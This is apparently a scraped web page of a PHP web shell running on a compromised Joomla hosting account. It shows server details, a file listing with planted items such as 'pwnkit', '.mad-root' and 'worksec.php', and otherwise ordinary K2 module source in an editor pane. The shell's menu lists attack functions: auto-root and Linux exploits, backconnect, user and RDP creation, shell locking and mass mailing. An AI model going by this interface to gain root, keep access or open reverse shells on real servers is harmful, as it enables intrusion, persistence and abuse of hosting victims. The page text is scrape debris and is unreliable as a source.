Linux webm002.cluster120.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.120.20.2 | : 216.73.216.49
Cant Read [ /etc/named.conf ]
8.5.7
verseaumee
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
verseaumee /
www /
modules /
mod_k2_user /
[ HOME SHELL ]
Name
Size
Permission
Action
tmpl
[ DIR ]
drwxr-xr-x
.htaccess
533
B
-rw-r--r--
.mad-root
0
B
-rw-r--r--
admin.php
5.24
KB
-rw-r--r--
helper.php
6.27
KB
-rw----r--
index.html
44
B
-rw----r--
index.php
7
KB
-rw-r--r--
mod_k2_user.php
3.68
KB
-rw----r--
mod_k2_user.xml
4.23
KB
-rw----r--
pwnkit
0
B
-rwxr-xr-x
worksec.php
1.06
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : mod_k2_user.php
<?php /** * @version 2.9.x * @package K2 * @author JoomlaWorks https://www.joomlaworks.net * @copyright Copyright (c) 2006 - 2018 JoomlaWorks Ltd. All rights reserved. * @license GNU/GPL license: http://www.gnu.org/copyleft/gpl.html */ // no direct access defined('_JEXEC') or die; if (K2_JVERSION != '15') { $language = JFactory::getLanguage(); $language->load('com_k2.dates', JPATH_ADMINISTRATOR, null, true); require_once JPATH_SITE.'/components/com_users/helpers/route.php'; } require_once(dirname(__FILE__).'/helper.php'); $moduleclass_sfx = $params->get('moduleclass_sfx', ''); $userGreetingText = $params->get('userGreetingText', ''); $userAvatarWidthSelect = $params->get('userAvatarWidthSelect', 'custom'); $userAvatarWidth = $params->get('userAvatarWidth', 50); // Legacy params $greeting = 0; $type = modK2UserHelper::getType(); $return = modK2UserHelper::getReturnURL($params, $type); $user = JFactory::getUser(); $componentParams = JComponentHelper::getParams('com_k2'); $K2CommentsEnabled = $componentParams->get('comments'); // User avatar if ($userAvatarWidthSelect == 'inherit') { $avatarWidth = $componentParams->get('userImageWidth'); } else { $avatarWidth = $userAvatarWidth; } // Load the right template if ($user->guest) { // OpenID stuff (do not edit) if (JPluginHelper::isEnabled('authentication', 'openid')) { $lang->load('plg_authentication_openid', JPATH_ADMINISTRATOR); $document = JFactory::getDocument(); $document->addScriptDeclaration(" var JLanguage = {}; JLanguage.WHAT_IS_OPENID = '".JText::_('K2_WHAT_IS_OPENID')."'; JLanguage.LOGIN_WITH_OPENID = '".JText::_('K2_LOGIN_WITH_OPENID')."'; JLanguage.NORMAL_LOGIN = '".JText::_('K2_NORMAL_LOGIN')."'; var modlogin = 1; "); JHTML::_('script', 'openid.js'); } // Get user stuff (do not edit) $usersConfig = JComponentHelper::getParams('com_users'); // Define some variables depending on Joomla version $passwordFieldName = K2_JVERSION != '15' ? 'password' : 'passwd'; $resetLink = JRoute::_((K2_JVERSION != '15') ? 'index.php?option=com_users&view=reset&Itemid='.UsersHelperRoute::getResetRoute() : 'index.php?option=com_user&view=reset'); $remindLink = JRoute::_((K2_JVERSION != '15') ? 'index.php?option=com_users&view=remind&Itemid='.UsersHelperRoute::getRemindRoute() : 'index.php?option=com_user&view=remind'); $registrationLink = JRoute::_((K2_JVERSION != '15') ? 'index.php?option=com_users&view=registration&Itemid='.UsersHelperRoute::getRegistrationRoute() : 'index.php?option=com_user&view=register'); $option = K2_JVERSION != '15' ? 'com_users' : 'com_user'; $task = K2_JVERSION != '15' ? 'user.login' : 'login'; require(JModuleHelper::getLayoutPath('mod_k2_user', 'login')); } else { $user->profile = modK2UserHelper::getProfile($params); $user->numOfComments = modK2UserHelper::countUserComments($user->id); $menu = modK2UserHelper::getMenu($params); if (is_object($user->profile) && isset($user->profile->addLink)) { $addItemLink = $user->profile->addLink; } $viewProfileLink = JRoute::_(K2HelperRoute::getUserRoute($user->id)); $editProfileLink = JRoute::_((K2_JVERSION != '15') ? 'index.php?option=com_users&view=profile&layout=edit&Itemid='.UsersHelperRoute::getProfileRoute() : 'index.php?option=com_user&view=user&task=edit'); $profileLink = $editProfileLink; // B/C $editCommentsLink = JRoute::_('index.php?option=com_k2&view=comments&tmpl=component&context=modalselector'); $option = K2_JVERSION != '15' ? 'com_users' : 'com_user'; $task = K2_JVERSION != '15' ? 'user.logout' : 'logout'; require(JModuleHelper::getLayoutPath('mod_k2_user', 'userblock')); }
Close